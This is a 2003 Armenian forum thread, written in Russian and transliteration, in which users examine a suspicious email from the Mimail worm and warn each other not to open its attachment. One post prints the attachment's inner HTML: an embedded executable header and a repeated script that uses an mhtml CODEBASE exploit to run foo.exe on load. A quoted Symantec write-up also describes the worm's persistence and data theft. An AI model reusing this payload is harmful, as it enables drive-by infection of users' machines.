AKB Forums

Go Back   AKB Forums > General Discussions > General
Home Register Blogs FAQ Members List Calendar Downloads Arcade Mark Forums Read

General Всякое

Troubles when posting message? Click here! :: Проблемы с отправлением сообщения? Нажмите сюда!

Reply
 
LinkBack Thread Tools Display Modes
Old Aug 5, 2003, 20:18   #1
Moderator
 
Mono's Avatar
 
Join Date: Oct 2001
Location: Yerevan
Posts: 5,393
Blog Entries: 1
Rep Power: 8
Reputation: 93
Question Хакеры атакуют....

смотрите что уже получаю второй день


---



Hello there,

I would like to inform you about important information regarding your
email address. This email address will be expiring.
Please read attachment for details.

---
Best regards, Administrator
fdqftckt

----


А вот это хедерс так сказать

----

Return-Path: <admin@freenet.am>
Received: from styx.aic.net (styx.aic.net [195.250.64.68])
by gampr.freenet.am (8.12.9/8.12.9) with ESMTP id h728oRXC002023
for <mono@freenet.am>; Sat, 2 Aug 2003 13:50:27 +0500 (AMST)
Received: from [217.113.7.194] (helo=localhost)
by styx.aic.net with smtp (Exim 4.20)
id 19is5b-000CWQ-9A
for mono@freenet.am; Sat, 02 Aug 2003 13:50:14 +0500
From: admin@freenet.am
To: Mono <mono@freenet.am>
Reply-To: admin@freenet.am
X-Mailer: The Bat! (v1.61)
X-Priority: 2 (High)
Subject: your account fdqftckt
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------18AB777E094567B"
Message-Id: <E19is5b-000CWQ-9A@styx.aic.net>
Date: Sat, 02 Aug 2003 13:50:14 +0500
Content-Length: 26147
Status:

------

С атачед файлом message.zip.

Koroche ya yego ne optkril.

Chto skajete.

1. Virus li eto ??
2. Hakeri ??
3. ili je vpravdu konec Freenetu ??
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
Mono is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 20:25   #2
freelancer
 
Yerkanian's Avatar
 
Join Date: Jun 2002
Location: the same place
Posts: 592
Rep Power: 7
Reputation: 10
kto-to iz clientov Web-a posilayet trojan mail cherez mail server Arminco chaynikam FreeNeta
Yerkanian is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 20:35   #3
Moderator
 
Mono's Avatar
 
Join Date: Oct 2001
Location: Yerevan
Posts: 5,393
Blog Entries: 1
Rep Power: 8
Reputation: 93
Yerkanian

eto ZIp fayl ili Exe fayl po tvoemu
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
Mono is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 20:44   #4
freelancer
 
Yerkanian's Avatar
 
Join Date: Jun 2002
Location: the same place
Posts: 592
Rep Power: 7
Reputation: 10
tol'ko chaynik mozhet podumat' otkrit' takoy attachment.

stiray nafig... a esli somnevayeshsya, pozvoni v administration i sprosi posilali oni takoy email.

elementarno...
Yerkanian is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 20:54   #5
Пожарник - огнеУтешитель
 
Art007's Avatar
 
Join Date: Mar 2002
Location: Yerevan
Posts: 1,054
Rep Power: 7
Reputation: 12
Send a message via ICQ to Art007
ne toko freenetovcam, sednya ya toje poluchil tochno to je pis'mo s takimi je header-ami na yahoo mail prosto delete
__________________
http://www.armino.am
http://art007.photosight.ru

"...как не верти, что то стало с глазами когда то загадочных женщин..."
Art007 is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 21:00   #6
Moderator
 
Mono's Avatar
 
Join Date: Oct 2001
Location: Yerevan
Posts: 5,393
Blog Entries: 1
Rep Power: 8
Reputation: 93
Ребята я не так выразился.

Мне интересно. Зип ли файл это? Если да то внутри может Ексешник есть или как??

либо же этот зип файл который использует баг в винзипе чтобы троянить через винзип.

либо же это не зип файл а эксешник.

Мне как то интересно что внутри
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
Mono is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 21:24   #7
freelancer
 
Yerkanian's Avatar
 
Join Date: Jun 2002
Location: the same place
Posts: 592
Rep Power: 7
Reputation: 10
mda, curiousity killed the rabit

kakim-to vieworom posmotri soderzhimoye - esli perviye dva simvola "MZ" - znachit exe ryadishkom budet navernoe i "This program cannot be run in DOS mode."
Yerkanian is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 21:53   #8
Moderator
 
Mono's Avatar
 
Join Date: Oct 2001
Location: Yerevan
Posts: 5,393
Blog Entries: 1
Rep Power: 8
Reputation: 93
interesno odnako smotrite na vnutrennosti etogo fayla

ne zrya je ya tak pilal curiositom

===========

PK__
_____+E_/Y_@ѕ•I__•I_____message.htmlMIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZђ_________яя__ё_______@_________________________ __________Ђ_____є__ґ Н!ё_LН!This program cannot be run in DOS mode. $_______PE__L___ЁќЈ?________а___


+
+
+


<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script><body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
}
setTimeout("malware()",150)

</script>PK____
_____+E_/Y_@ѕ•I__•I___________ _______message.htmlPK__________:___їI____
__________________
---------------
Արատտայի ու Խալդեյի հովանավոր .
Mono is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 21:58   #9
холостяк и точка.
 
Medved Kosolapiy's Avatar
 
Join Date: Mar 2002
Location: там где нет никому места
Posts: 6,593
Rep Power: 8
Reputation: 281
Send a message via ICQ to Medved Kosolapiy Send a message via Skype™ to Medved Kosolapiy
Наверно БАТ файл с иконкой Зипа
так "Мп3" рассылали типа, БАт файл а инонка ВинАмпа, никто даже не подумал подумать почему если даже в компе нету винама иконка такая?!
__________________
Сколько волка не корми, Медведь все равно круче!!!

Идет по лесу турист.Вдруг ему навстречу выходит медведь,и между ними
происходит следующий диалог.
Медведь:
- Ты кто?
- Турист.
- Врешь,турист - это я,а ты 'завтрак туриста'.
Medved Kosolapiy is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 22:04   #10
Banned
 
DaNYer's Avatar
 
Join Date: Oct 2002
Location: Brooklyn, New York
Posts: 3,760
Rep Power: 0
Reputation: 10
Interesno etot virus na trojan ne poxoj... on chto tol'ko "moo ha ha" kaet?

kstati mojet eto on ---> obyavlenie iz yahoo:
DaNYer is offline   Reply With Quote Quote selected
Old Aug 5, 2003, 22:08   #11
Banned
 
DaNYer's Avatar
 
Join Date: Oct 2002
Location: Brooklyn, New York
Posts: 3,760
Rep Power: 0
Reputation: 10
i eshe zdes':
http://securityresponse.symantec.com...mail.a@mm.html

virus identificirovan!!!
Quote:
When W32.Mimail.A@mm is run, it does the following:


Copies itself to %Windir%\Videodrv.exe.


Adds the value:

"VideoDriver"="%Windir%\videodrv.exe"

to the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

so that W32.Mimail.A@mm runs when you start Windows.


Collects email addresses from all the files except those with the following file extensions:
.bmp
.jpg
.gif
.exe
.dll
.avi
.mpg
.mp3
.vxd
.ocx
.psd
.tif
.zip
.rar
.pdf
.cab
.wav
.com


Writes all the email addresses to the file, %Windir%\eml.tmp, if it can resolve www.google.com to any IP address.


Captures text from specific windows and sends the data to email addresses that the worm contains.


Uses its own SMTP server to spread by email.
The email has the following characteristics:

From: admin@<current domain> (The from address may be spoofed to appear that it is coming from the current domain)

Subject: your account %s

Message:
Hello there,
I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details.

Best regards,
Administrator

Attachment: Message.zip


Message.zip contains only one file, Message.htm, which uses a code base exploit to create a copy of the worm named Foo.exe in the Temporary Internet Files folder, and then runs it. The compression method of this file inside the zip file is stored so that compression is not used at all.

Information about this vulnerability and a Microsoft patch is located at: http://support.microsoft.com/default...;en-us;330994. We encourage system administrators to apply the Microsoft patch to prevent infection by this worm.


When the HTML file is executed, it will cause the following registry key to be created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{11111111-1111-1111-1111-111111111111}


The worm creates two additional files in the %Windir% folder:
Zip.tmp: This is a temporary copy of message.zip (30,079 bytes).
Exe.tmp: This is a temporary copy of message.html (29,957 bytes).
DaNYer is offline   Reply With Quote Quote selected
Old Aug 6, 2003, 03:51   #12
Грустно...
 
Agregat's Avatar
 
Join Date: Aug 2002
Location: Там, где всегда идут дожди
Posts: 21,450
Rep Power: 10
Reputation: 144
Send a message via ICQ to Agregat Send a message via MSN to Agregat
так как майл адреса admin@freenet.am не существует надо сразу это письмо подальше послать и хрен с аттачментом
__________________
http://аvitya.livejournal.com
Хотели, как лучше, а получилось даже хуже...
Лозунг шахматиста: На каждый шах - ответим матом!
Agregat is offline   Reply With Quote Quote selected
Old Aug 6, 2003, 05:07   #13
Administrator
 
greka's Avatar
 
Join Date: Sep 2001
Location: @work
Posts: 5,341
Rep Power: 10
Reputation: 23
Send a message via ICQ to greka
я аттачменты всегда в NOTEPAD кидаю.

header-ы очень просто распознать - экзешник это, скрипт, WinZIP или т.п. - просто попробуйте это на обычных файлах и заметите в начальных байтах общую инфу.




А вот Арминко за такие действия отвечать должен, или нет ?
__________________
И повешенные могут качаться в неположенную сторону. /С.Е.Лец/
greka is offline   Reply With Quote Quote selected
Old Aug 6, 2003, 05:49   #14
The Reloaded
 
Aram Hambardzumyan's Avatar
 
Join Date: Jan 2002
Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,176
Rep Power: 7
Reputation: 41
я тоже получал такое письмо. в атаче нормальный зип. в зипе сидит html-файл, часть которого составляет экзешник. наверное если открыть в ie, что-нибудь да и случится...
Aram Hambardzumyan is offline   Reply With Quote Quote selected
Old Aug 6, 2003, 05:52   #15
The Reloaded
 
Aram Hambardzumyan's Avatar
 
Join Date: Jan 2002
Location: behind the flesh and gelatinе of soft dull eyes
Posts: 3,176
Rep Power: 7
Reputation: 41
Quote:
Originally posted by Greco El
А вот Арминко за такие действия отвечать должен, или нет ?
если это их юзер, то они должны надрать ему уши. вот как заставить их это сделать, не знаю. однажды я от клиента нетсиса получил подозрительное письмо, сообщил им, и ни ответа, ни привета. мочить таких провайдеров надо
Aram Hambardzumyan is offline   Reply With Quote Quote selected
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 22:11.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
This board was founded on September 29, 2001
Powered by Viper Internet

Affordable Web Hosting | ParevNet

Buy text link